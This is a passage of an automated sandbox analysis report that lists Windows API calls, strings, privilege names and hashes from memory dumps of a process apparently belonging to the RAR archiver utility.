                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CloseFind
                                                        • String ID:
                                                        • API String ID: 1863332320-0
                                                        • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                        • Instruction ID: b9cdf2d64abc763d41a0d1dad0064c232bd72716bbdd0b8f401ad51796970ca2
                                                        • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                        • Instruction Fuzzy Hash: F2C02B29E0148180DB04732D8C450741310BF45739FD00332C13F056E0CF1C40EF0310
                                                        APIs
                                                          • Part of subcall function 00007FF7F7EC49F4: LoadStringW.USER32 ref: 00007FF7F7EC4A7B
                                                          • Part of subcall function 00007FF7F7EC49F4: LoadStringW.USER32 ref: 00007FF7F7EC4A94
                                                          • Part of subcall function 00007FF7F7ECB6D0: Sleep.KERNEL32(?,?,?,?,00007FF7F7E9CBED,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7ECB730
                                                        • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7EA6CB0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: LoadString$Sleepfflushswprintf
                                                        • String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
                                                        • API String ID: 668332963-4283793440
                                                        • Opcode ID: cff16b410779efd6418cbb4bfaefd77790891fdcb5da60b35bb77876aa469163
                                                        • Instruction ID: 0e58024737e02f621b02074d7ca948c665a913afc3a212ce73d89d006cef94c8
                                                        • Opcode Fuzzy Hash: cff16b410779efd6418cbb4bfaefd77790891fdcb5da60b35bb77876aa469163
                                                        • Instruction Fuzzy Hash: F322822AA086C245FB20FB24D4400F9A7A2FF55744FC45037D66F47AEADE2DE606C7A0
                                                        APIs
                                                        • CreateFileW.KERNEL32 ref: 00007FF7F7E9D4A6
                                                        • CloseHandle.KERNEL32 ref: 00007FF7F7E9D4B9
                                                          • Part of subcall function 00007FF7F7E9EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F7E9EE47), ref: 00007FF7F7E9EF73
                                                          • Part of subcall function 00007FF7F7E9EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF7F7E9EE47), ref: 00007FF7F7E9EF84
                                                          • Part of subcall function 00007FF7F7E9EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7F7E9EFA7
                                                          • Part of subcall function 00007FF7F7E9EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7F7E9EFCA
                                                          • Part of subcall function 00007FF7F7E9EF50: GetLastError.KERNEL32 ref: 00007FF7F7E9EFD4
                                                          • Part of subcall function 00007FF7F7E9EF50: CloseHandle.KERNEL32 ref: 00007FF7F7E9EFE7
                                                        • CreateDirectoryW.KERNEL32 ref: 00007FF7F7E9D4C6
                                                        • CreateFileW.KERNEL32 ref: 00007FF7F7E9D64A
                                                        • DeviceIoControl.KERNEL32 ref: 00007FF7F7E9D68B
                                                        • CloseHandle.KERNEL32 ref: 00007FF7F7E9D69A
                                                        • GetLastError.KERNEL32 ref: 00007FF7F7E9D6AD
                                                        • RemoveDirectoryW.KERNEL32 ref: 00007FF7F7E9D6FA
                                                        • DeleteFileW.KERNEL32 ref: 00007FF7F7E9D705
                                                          • Part of subcall function 00007FF7F7EA2310: FlushFileBuffers.KERNEL32 ref: 00007FF7F7EA233E
                                                          • Part of subcall function 00007FF7F7EA2310: SetFileTime.KERNEL32 ref: 00007FF7F7EA23DB
                                                          • Part of subcall function 00007FF7F7EA1930: FindCloseChangeNotification.KERNELBASE ref: 00007FF7F7EA1958
                                                          • Part of subcall function 00007FF7F7EA39E0: SetFileAttributesW.KERNEL32(?,00007FF7F7EA34EE,?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EA3A0F
                                                          • Part of subcall function 00007FF7F7EA39E0: SetFileAttributesW.KERNEL32(?,00007FF7F7EA34EE,?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EA3A3C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: File$Close$CreateHandle$AttributesDirectoryErrorLastProcessToken$AdjustBuffersChangeControlCurrentDeleteDeviceFindFlushLookupNotificationOpenPrivilegePrivilegesRemoveTimeValue
                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                        • API String ID: 2827264287-3508440684
                                                        • Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                        • Instruction ID: b7112cfe0c8a30db4440cf0878d5d85e047f3c3546947055c37aa60e32a5876f
                                                        • Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                        • Instruction Fuzzy Hash: ACD1B32AA1869695EB20EF20D8506F9B7B0FB44798FC04132DA6E476D5DF3CD507C7A0
                                                        APIs
                                                        • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7F7E82E4C), ref: 00007FF7F7ECAEE9
                                                        • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7F7E82E4C), ref: 00007FF7F7ECAF01
                                                        • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7F7E82E4C), ref: 00007FF7F7ECAF19
                                                        • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7F7E82E4C), ref: 00007FF7F7ECAF75
                                                        • GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7F7E82E4C), ref: 00007FF7F7ECAFB0
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7F7E82E4C), ref: 00007FF7F7ECB23B
                                                        • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7F7E82E4C), ref: 00007FF7F7ECB244
                                                        • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7F7E82E4C), ref: 00007FF7F7ECB287
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
                                                        • String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
                                                        • API String ID: 3483800833-4165214152
                                                        • Opcode ID: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                        • Instruction ID: 188e8c1e13a6bd989bdeaf7c4dc9a535e126e8154a6b847d276f3a1305a488f3
                                                        • Opcode Fuzzy Hash: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                        • Instruction Fuzzy Hash: 7AC18F2AA09A8285EB14EF21E8502EDB7A0FB44794F844036DA6E47BD5DF3CD546C790
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                        • String ID: SeShutdownPrivilege
                                                        • API String ID: 3729174658-3733053543
                                                        • Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                        • Instruction ID: 796b36e25346c44341ed11a745bd0aed98673fe480ad0a5321c561e106252c7b
                                                        • Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                        • Instruction Fuzzy Hash: D621A839A1865282F750EB20E4557BAF361EB84704FD05036D56F469D4CF3DD447C7A0
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF7F7E82014), ref: 00007FF7F7E9E298
                                                        • FindClose.KERNEL32(?,?,?,00000001,?,00007FF7F7E82014), ref: 00007FF7F7E9E2AB
                                                        • CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF7F7E82014), ref: 00007FF7F7E9E2F7
                                                          • Part of subcall function 00007FF7F7E9EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F7E9EE47), ref: 00007FF7F7E9EF73
                                                          • Part of subcall function 00007FF7F7E9EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF7F7E9EE47), ref: 00007FF7F7E9EF84
                                                          • Part of subcall function 00007FF7F7E9EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7F7E9EFA7
                                                          • Part of subcall function 00007FF7F7E9EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7F7E9EFCA
                                                          • Part of subcall function 00007FF7F7E9EF50: GetLastError.KERNEL32 ref: 00007FF7F7E9EFD4
                                                          • Part of subcall function 00007FF7F7E9EF50: CloseHandle.KERNEL32 ref: 00007FF7F7E9EFE7
                                                        • DeviceIoControl.KERNEL32 ref: 00007FF7F7E9E357
                                                        • CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF7F7E82014), ref: 00007FF7F7E9E362
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
                                                        • String ID: SeBackupPrivilege
                                                        • API String ID: 3094086963-2429070247
                                                        • Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                        • Instruction ID: 6066a510d43b3103bcd6421e651339d2a19ff239e27c6af4391c7e0dfced45bb
                                                        • Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                        • Instruction Fuzzy Hash: 3A61813BA0868186E714AB25E4846F9A3B0FB447A4FC04236DBBF16AD4DF3CD556C790
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Sleepswprintf
                                                        • String ID: $%ls%0*u.rev
                                                        • API String ID: 407366315-3491873314
                                                        • Opcode ID: be504934a9b1dd2da099aac91cc6efeb4d9364db6ee78d320e7c6c33f3a06880
                                                        • Instruction ID: 9209fce3c26ddb2f3172472b6a15714791542f4861042f9e4c1858090261a6d5
                                                        • Opcode Fuzzy Hash: be504934a9b1dd2da099aac91cc6efeb4d9364db6ee78d320e7c6c33f3a06880
                                                        • Instruction Fuzzy Hash: F902053AA0468286EB20EB29E4445ADF7A5FB88784F800137DE6E477D5DE3CE446C790
                                                        APIs
                                                        • new.LIBCMT ref: 00007FF7F7E84BD8
                                                          • Part of subcall function 00007FF7F7ECB6D0: Sleep.KERNEL32(?,?,?,?,00007FF7F7E9CBED,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7ECB730
                                                          • Part of subcall function 00007FF7F7EA1E80: CreateFileW.KERNELBASE ref: 00007FF7F7EA1F4A
                                                          • Part of subcall function 00007FF7F7EA1E80: GetLastError.KERNEL32 ref: 00007FF7F7EA1F59
                                                          • Part of subcall function 00007FF7F7EA1E80: CreateFileW.KERNELBASE ref: 00007FF7F7EA1F99
                                                          • Part of subcall function 00007FF7F7EA1E80: GetLastError.KERNEL32 ref: 00007FF7F7EA1FA2
                                                          • Part of subcall function 00007FF7F7EA1E80: SetFileTime.KERNEL32 ref: 00007FF7F7EA1FF1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: File$CreateErrorLast$SleepTime
                                                        • String ID: %12s %s$%12s %s$ $%s
                                                        • API String ID: 2965465231-221484280
                                                        • Opcode ID: e455637c68bc7564410924072a6d36a8d2fc6e2fd6ac8c4536b249eeb429af35
                                                        • Instruction ID: 375393d33d49e1eea99947c082600d89e4fc66ec195d70e1a7a2f37582a3fe10
                                                        • Opcode Fuzzy Hash: e455637c68bc7564410924072a6d36a8d2fc6e2fd6ac8c4536b249eeb429af35
                                                        • Instruction Fuzzy Hash: 5AF1BF2AB0968685EB60EF12D0402BDA7A1FB45B84FC44037DA6E0B7D5DF3CD55AC790
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                        • Instruction ID: 79720ad47e567d6ba9e955f4a90a4899247e57077898e7b80e56c8a0aad031cf
                                                        • Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                        • Instruction Fuzzy Hash: 9231863A608B8186DB60DF25E8402EDB3A4FB85754F940136EAAE43B94DF3CD546CB50
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                        • String ID:
                                                        • API String ID: 3398352648-0
                                                        • Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                        • Instruction ID: 8dab29ad4c9b014bb483c206ab4122bd06670328fcc8eb62a9dee08561c82e47
                                                        • Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                        • Instruction Fuzzy Hash: 6611753661874182E7509F21F84056AB3B0FB88B84FC44437EAAF43A94DF3CD006CB90
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
                                                        • String ID:
                                                        • API String ID: 3116915952-0
                                                        • Opcode ID: ca3bb635289236c8f91ef8656bb3d77759dfc4cba9f1f81f5f4e0259b259522b
                                                        • Instruction ID: fd0e860678c6340e2b964689b7d70e6ec643020866443c3c29d5e86b1fc81e3e
                                                        • Opcode Fuzzy Hash: ca3bb635289236c8f91ef8656bb3d77759dfc4cba9f1f81f5f4e0259b259522b
